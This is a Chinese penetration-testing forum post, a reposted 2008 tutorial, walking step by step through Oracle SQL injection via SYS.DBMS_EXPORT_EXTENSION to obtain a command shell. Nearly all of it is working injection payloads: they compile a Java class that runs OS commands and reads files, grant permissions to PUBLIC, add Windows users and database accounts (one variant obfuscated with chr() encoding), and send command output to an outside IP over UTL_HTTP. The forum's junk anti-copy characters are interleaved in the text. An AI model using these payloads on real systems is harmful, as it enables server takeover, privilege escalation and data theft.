找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 实例演示oracle注入获取cmdshell的全过程
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2196|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
6 ]6 h$ a' Y9 D8 T, V) A
* `+ i9 ~0 L& x  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) 9 K4 U. x3 Z. T: C6 \# N
的形式即可。(用" 'a'|| "是为了让语句返回true值)
9 m, {) D/ u6 s/ p语句有点长,可能要用post提交。 " h+ i$ ^' U0 i) S
以下是各个步骤: 7 ?% Y8 G6 _% _# z/ Y
1.创建包
6 }* f2 |& {& t9 h6 s+ c1 k通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:% P1 d. J# H. P
/xxx.jsp?id=1 and '1'<>'a'||(
. @3 b; _8 U7 O2 D5 Q$ K+ pselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 S, s, \2 U3 D- Y& ?create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
6 ~2 a. D+ w3 znew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
4 r0 P, [! _* l5 |9 S}'''';END;'';END;--','SYS',0,'1',0) from dual
' @; W3 C3 D5 ?  V* ~* g' [7 F) 3 T+ B( r  G0 `- `" M
------------------------
% l8 V$ R+ L, H8 v2 C4 U  ~如果url有长度限制,可以把readFile()函数块去掉,即:   j" g8 D9 c" g% q
/xxx.jsp?id=1 and '1'<>'a'||( ' d3 f3 z/ q; U7 k' G( N5 N% ]1 K
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" l3 D) j* g  @5 Wcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
. B7 |8 K7 ^7 {) @- }3 [8 h) B( tnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
+ J* P6 O, @1 U2 `2 c}'''';END;'';END;--','SYS',0,'1',0) from dual
- ]# |8 }& @& k)
" z1 o- E1 O5 M5 U8 S& k3 l& x同时把后面步骤 提到的 对readFile()的处理语句去掉。
4 P1 w0 G9 y4 G1 P9 q------------------------------
8 V4 t$ I! M" e4 a9 j7 _. V$ y  S7 A2.赋Java权限
  r5 M' k3 ^- a: tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual5 O; m  U) ]8 X0 \7 H  T
3.创建函数 ! W" p* N8 [( \4 i% J! q
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  E: q( u$ P! I( `create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual' s. K* n2 j: D: \" p! p
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& B" f% r* C& s; `; U  W& d; Fcreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
  h9 K# U8 E# n% X' }8 e8 d# E8 D4.赋public执行函数的权限
, R0 Z" Z( F# s1 E  x+ U. V6 Pselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
+ e+ }& U6 w* w$ ?) ]1 Qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual. p( r0 K8 g% T: o
5.测试上面的几步是否成功 . f+ u- E& \8 S8 a& ]
and '1'<>'11'||(
4 T" @$ @% Q4 L$ |3 }9 u4 eselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
( ?9 ?$ {$ a) z# n)
$ W, m9 p7 s; Y0 z6 M5 wand '1'<>(
* l& N" K( B: U! Fselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' ( i7 f3 A0 Q( ?" ]* b' V
)
  ~$ @0 R; p1 d& f# \+ p- a6.执行命令: ( Q7 W- _! c* G1 G7 p
/xxx.jsp?id=1 and '1'<>( 3 v; ^& ~2 t3 d5 a2 K8 ]
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
0 q" Y! K% G. {
' {0 v5 D* f% h# O- g9 Q" e5 F- {) 8 p' v( U; D- l1 {' M+ m5 R
/xxx.jsp?id=1 and '1'<>( * _, F6 }% p5 F8 n! {" n; s: F
select  sys.LinxReadFile('c:/boot.ini') from dual
! ~) f2 g. P  o# H
# p) X+ k8 r& w& @' E  z0 S/ })* w% h  W* F4 f8 A; n9 ~
  
4 ]8 h$ T+ f9 ~+ k注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 / m9 }# v' S% H
如果要查看运行结果可以用 union : - X% |- r$ Q; G% \, G4 k
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual/ h$ ]( P, s% G! w  G
或者UTL_HTTP.request(: % E5 X- \$ ?  k% m' E, R9 ?0 W2 g2 w6 y
/xxx.jsp?id=1 and '1'<>( / ?$ h1 {8 Y. y! S5 ~1 V
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
) S! ^+ W5 N4 B3 w0 i6 v- I) $ \' u7 j9 h+ j. x# C& n+ }
/xxx.jsp?id=1 and '1'<>(
9 j! Z* R) g+ y% g3 N1 pSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual' Y1 m- f! @5 y2 a, }6 K- u
) 5 e7 E& G) }* R4 t& O( p' q; @, ~
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
' d; u# b0 \2 I3 a  X& f: }--------------------
5 Y6 R  J* H6 i% t$ h$ q6.内部变化
/ Y: G3 e# R7 ]) G7 f- _通过以下命令可以查看all_objects表达改变:
! V- A" m2 c; y% ^9 [" y3 iselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
& W2 p7 Z, R5 b7.删除我们创建的函数
: o3 t- P' C- }( S1 E# F  ]. O/ Gselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ m; v4 ]. [5 tdrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual ( Q' \9 j6 W# i; K9 ^
====================================================
, v1 H! p0 Y: A2 j0 V- S9 a& d; [全文结束。谨以此文赠与我的朋友。 ; P1 c( @5 l% s5 a: G6 s( ~
linx
) T- n, K! l* y3 W3 i! M1 V# @6 d+ i124829445
  ^; m/ a1 u4 E+ }8 J0 J, r2008.1.12
1 k- N$ f7 |( h8 M" elinyujian@bjfu.edu.cn
# F% s+ k8 q# |% J. M* a======================================================================
* D  }" g3 V. m9 c测试漏洞的另一方法:
* `- `# N5 h% \0 b. ?创建oracle帐号:
) I8 B: i2 J! h* Xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
3 ^! y* e% D( j+ k) \- r1 jCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
# x$ [: @2 ^6 h4 Y# g) k/ G/ H即:
1 [& \0 g+ Y' w. I; vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
# f6 ^% j# b( g" A0 X; rchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
% l+ F1 _. m, @8 Z# j* S, @6 n: p$ n确定漏洞存在:
, f2 J* m1 [- W/ @1<>(
+ P/ D7 H/ U! X- Dselect user_id from all_users where username='LINXSQL' , Z2 y" j( ^& m; J  R" ]
) & G- Y, X) X" F7 e% G& f
给linxsql连接权限:
4 C1 h8 y* I8 {( L) i) y2 l5 dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''7 D( g7 V+ h8 l
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual 5 o  t# i$ g% |" w  }3 Q
删除帐号: 5 }1 Q2 T4 }  q  I% t$ A, Z( R
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''', W4 e; J5 n5 C# ^; ^( k
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
7 R5 v) ?5 b5 O" w. R======================
9 U/ S# n# N1 r0 [0 A以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:8 {# q  ?' G9 o; J) @2 l
1.jsp?id=1 and '1'<>(
7 s6 E1 ~+ N6 @+ t2 Lselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 z: ^* C0 f  `( p  ?create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual( _8 l) J- E/ `( ^" g, U8 U
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
( U# X* S3 l. R9 O1 B9 l) L  } )- X# ^, N& G2 Y8 p# ]: J6 Q
- X4 ]7 l- t/ E  u% H5 v

) L) u/ l- N4 L0 p1 q) }. f1 c+ [& l6 c) p2 m' u6 T
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表